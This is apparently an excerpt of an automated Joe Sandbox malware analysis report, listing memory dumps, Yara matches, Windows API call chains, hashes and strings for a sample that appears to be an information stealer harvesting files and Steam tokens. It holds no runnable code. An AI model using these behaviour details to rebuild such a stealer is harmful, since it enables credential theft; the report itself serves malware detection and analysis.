                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrcpy
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3722407311-0
                                                                                                                                                                                                                                              • Opcode ID: 3a96b665b3cbcbf55da3d0258d3f7f573c41df7ba93c0507f9044406bed029a1
                                                                                                                                                                                                                                              • Instruction ID: 4355cab003f180362ea4467312be264c8b2230b95154913c46dc9b5fce20c885
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3a96b665b3cbcbf55da3d0258d3f7f573c41df7ba93c0507f9044406bed029a1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D719871B002099BCF08FF75D9929EEB77AAF94304B10852EF4099B285EA34DE45CBC5
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,040837D8), ref: 0040EFCE
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,04083938), ref: 0040F06F
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,040837E8), ref: 0040F17E
                                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrcpy
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3722407311-0
                                                                                                                                                                                                                                              • Opcode ID: 31357a372ffa8051568a26c3519af1ef57e737c077d660d25448396aefe02b83
                                                                                                                                                                                                                                              • Instruction ID: f0c51ec5e8e6f52f2f367cc82315d09f99f950b48122d5325302ee48485a66a2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 31357a372ffa8051568a26c3519af1ef57e737c077d660d25448396aefe02b83
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 03618A71B002099FCF08EF75D9929EEB77AAF94304B10852EF4099B295DA34EE45CBC4
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0041281A
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,04086D58), ref: 00412838
                                                                                                                                                                                                                                                • Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
                                                                                                                                                                                                                                                • Part of subcall function 00412570: FindFirstFileA.KERNELBASE(?,?), ref: 004125A0
                                                                                                                                                                                                                                                • Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
                                                                                                                                                                                                                                                • Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
                                                                                                                                                                                                                                                • Part of subcall function 00412570: FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
                                                                                                                                                                                                                                                • Part of subcall function 00412570: FindClose.KERNEL32(000000FF), ref: 004127CE
                                                                                                                                                                                                                                                • Part of subcall function 00412570: wsprintfA.USER32 ref: 0041260A
                                                                                                                                                                                                                                                • Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D4B2), ref: 0041261C
                                                                                                                                                                                                                                                • Part of subcall function 00412570: wsprintfA.USER32 ref: 00412639
                                                                                                                                                                                                                                                • Part of subcall function 00412570: PathMatchSpecA.SHLWAPI(?,?), ref: 0041266F
                                                                                                                                                                                                                                                • Part of subcall function 00412570: lstrcat.KERNEL32(?,04083B88), ref: 0041269B
                                                                                                                                                                                                                                                • Part of subcall function 00412570: lstrcat.KERNEL32(?,0041D880), ref: 004126AD
                                                                                                                                                                                                                                                • Part of subcall function 00412570: lstrcat.KERNEL32(?,?), ref: 004126BE
                                                                                                                                                                                                                                                • Part of subcall function 00412570: lstrcat.KERNEL32(?,0041D884), ref: 004126D0
                                                                                                                                                                                                                                                • Part of subcall function 00412570: lstrcat.KERNEL32(?,?), ref: 004126E4
                                                                                                                                                                                                                                                • Part of subcall function 00412570: CopyFileA.KERNEL32(?,?,00000001), ref: 004126FA
                                                                                                                                                                                                                                                • Part of subcall function 00412570: DeleteFileA.KERNEL32(?), ref: 00412779
                                                                                                                                                                                                                                                • Part of subcall function 00412570: wsprintfA.USER32 ref: 0041265B
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                                                                                              • String ID: 00A
                                                                                                                                                                                                                                              • API String ID: 2104210347-95910775
                                                                                                                                                                                                                                              • Opcode ID: 0059c6a1cdbce71a941e6102a03021f307d23a853d510470ca8830f04c47ea2b
                                                                                                                                                                                                                                              • Instruction ID: 9a839e9be304faf39bc4facc08b08f26c4420ed68fa3aa933a56f5c5bfc0aac5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0059c6a1cdbce71a941e6102a03021f307d23a853d510470ca8830f04c47ea2b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6441ABB7A001047BCB24FBE0DC92EEA377E9B94705F00424DB55987191ED74A7D48BD9
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C1F3095
                                                                                                                                                                                                                                                • Part of subcall function 6C1F35A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C27F688,00001000), ref: 6C1F35D5
                                                                                                                                                                                                                                                • Part of subcall function 6C1F35A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C1F35E0
                                                                                                                                                                                                                                                • Part of subcall function 6C1F35A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C1F35FD
                                                                                                                                                                                                                                                • Part of subcall function 6C1F35A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C1F363F
                                                                                                                                                                                                                                                • Part of subcall function 6C1F35A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C1F369F
                                                                                                                                                                                                                                                • Part of subcall function 6C1F35A0: __aulldiv.LIBCMT ref: 6C1F36E4
                                                                                                                                                                                                                                              • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C1F309F
                                                                                                                                                                                                                                                • Part of subcall function 6C215B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C2156EE,?,00000001), ref: 6C215B85
                                                                                                                                                                                                                                                • Part of subcall function 6C215B50: EnterCriticalSection.KERNEL32(6C27F688,?,?,?,6C2156EE,?,00000001), ref: 6C215B90
                                                                                                                                                                                                                                                • Part of subcall function 6C215B50: LeaveCriticalSection.KERNEL32(6C27F688,?,?,?,6C2156EE,?,00000001), ref: 6C215BD8
                                                                                                                                                                                                                                                • Part of subcall function 6C215B50: GetTickCount64.KERNEL32 ref: 6C215BE4
                                                                                                                                                                                                                                              • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C1F30BE
                                                                                                                                                                                                                                                • Part of subcall function 6C1F30F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C1F3127
                                                                                                                                                                                                                                                • Part of subcall function 6C1F30F0: __aulldiv.LIBCMT ref: 6C1F3140
                                                                                                                                                                                                                                                • Part of subcall function 6C22AB2A: __onexit.LIBCMT ref: 6C22AB30
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716177431.000000006C1F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 6C1F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716123546.000000006C1F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716466376.000000006C26D000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716499748.000000006C27E000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716526775.000000006C282000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c1f0000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4291168024-0
                                                                                                                                                                                                                                              • Opcode ID: fdfd46ecbb695852b360b0b8a931a6a7677edfbf66e67dc58fb0875b31cf0ae3
                                                                                                                                                                                                                                              • Instruction ID: 8ef74fcd89670ee0cf00419ef305b0a8cf5fc0ff5c39d264b41b11c903cc1422
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fdfd46ecbb695852b360b0b8a931a6a7677edfbf66e67dc58fb0875b31cf0ae3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3CF0F912D2475896CB11EF3488C52E773B0AF6B614F505319EC64635A1FF2062D9C3A2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
                                                                                                                                                                                                                                              • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00415BAF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3183270410-0
                                                                                                                                                                                                                                              • Opcode ID: 97fc9d568dab5260ce1fa1a51ba1ebaf2853d767a04b83f08cd6b5726440208b
                                                                                                                                                                                                                                              • Instruction ID: b12b055c0fde6327b7bfc42128d307bcca402a5100f46dd347d8d84938e244fe
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 97fc9d568dab5260ce1fa1a51ba1ebaf2853d767a04b83f08cd6b5726440208b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C5F05475A0010CFBDB14DFA4DC4AFED7778BB08300F004499BA0597280D6B06E85CB94
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                                                                                                                                                              • GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Heap$AllocComputerNameProcess
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4203777966-0
                                                                                                                                                                                                                                              • Opcode ID: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
                                                                                                                                                                                                                                              • Instruction ID: 2ac30a00ccf60c4f43266989ac8565747831d88261cb92d9c694311de33eed43
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F1E0D8B0A00608FBCB20DFE4DD48BDD77BCAB04305F100055FA05D3240D7749A458B96
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
                                                                                                                                                                                                                                              • VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00401103
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Process$AllocCurrentExitNumaVirtual
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1103761159-0
                                                                                                                                                                                                                                              • Opcode ID: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
                                                                                                                                                                                                                                              • Instruction ID: b86936f0f7b92ad6105a5e8d9325c57b614f4cde8fc05540e07f2d0ff83aec39
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1BE0867098570CBBE7309BA0DD0AB1976689B08B06F101055F7097A1D0C6B425008699
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 004119C8
                                                                                                                                                                                                                                                • Part of subcall function 00411650: wsprintfA.USER32 ref: 00411669
                                                                                                                                                                                                                                                • Part of subcall function 00411650: FindFirstFileA.KERNEL32(?,?), ref: 00411680
                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 00411A4D
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: strtok_s$FileFindFirstwsprintf
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3409980764-0
                                                                                                                                                                                                                                              • Opcode ID: 975833a798ef07385fb740c26f6e35f7306421425023d288693ea324a83a39c3
                                                                                                                                                                                                                                              • Instruction ID: 5fc3070f54b5ba386e916c7c3ae22cc6ad81f817c7a7f871d2ab45b9afc63085
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 975833a798ef07385fb740c26f6e35f7306421425023d288693ea324a83a39c3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 19215471900108EBCB14FFA5CC55FED7B79AF44345F10805AF51A97151EB386B84CB99
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,04082BB0,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,0041D599,?,?,?,?,?,?,00412FF8,?), ref: 00412B5A
                                                                                                                                                                                                                                                • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                                • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                                • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04083B38), ref: 00404ED9
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrlen$lstrcpy$InternetOpen
                                                                                                                                                                                                                                              • String ID: steam_tokens.txt
                                                                                                                                                                                                                                              • API String ID: 2934705399-401951677
                                                                                                                                                                                                                                              • Opcode ID: 0e3b4742804874a780a066254cb668122dfdc385ba13d8aa658f83288e45540c
                                                                                                                                                                                                                                              • Instruction ID: 10dd2298c38adeb5e36390c5bfe4eda46295fd03d88468a146a299c80adb3810
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e3b4742804874a780a066254cb668122dfdc385ba13d8aa658f83288e45540c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 18F08175D1020866CB18FBB2EC539ED773D9E54348B00425EF81662491EF38A788C6E9
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InfoSystemwsprintf
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2452939696-0
                                                                                                                                                                                                                                              • Opcode ID: ae5762f0629c30c52eb39fe9d29b6f6254fbc8fd6ef0ba27fd947bac7523c98c
                                                                                                                                                                                                                                              • Instruction ID: d87a4f6b3ea3f44bdf221dc5e2fa01f01132d118a4d77551e5f155a4815ada85
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae5762f0629c30c52eb39fe9d29b6f6254fbc8fd6ef0ba27fd947bac7523c98c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FAD012B580020C5BD720DBD0ED49AE9B77DBB44204F4049A5EE1492140EBB96AD58AA5
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                                                                                                                                                                • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                                                                                                                                                                • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040B190
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040B1A4
                                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                                • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                                • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04083B38), ref: 00404ED9
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrcpy$lstrlen$lstrcat$AllocInternetLocalOpenmemcmpmemset
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 574041509-0
                                                                                                                                                                                                                                              • Opcode ID: a6a78ff70d27b61a9f6037f1a30da5da91f984a2f7bb54771162fbb6bc8815ef
                                                                                                                                                                                                                                              • Instruction ID: df99340f366afcb3d937a345db0e295b6fae9bf0b5ece921659d29683b3ff0c0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a6a78ff70d27b61a9f6037f1a30da5da91f984a2f7bb54771162fbb6bc8815ef
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6CE114769101189BCF15EBA1DC92EEE773DBF54308F41415EF10676091EF38AA89CBA8
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
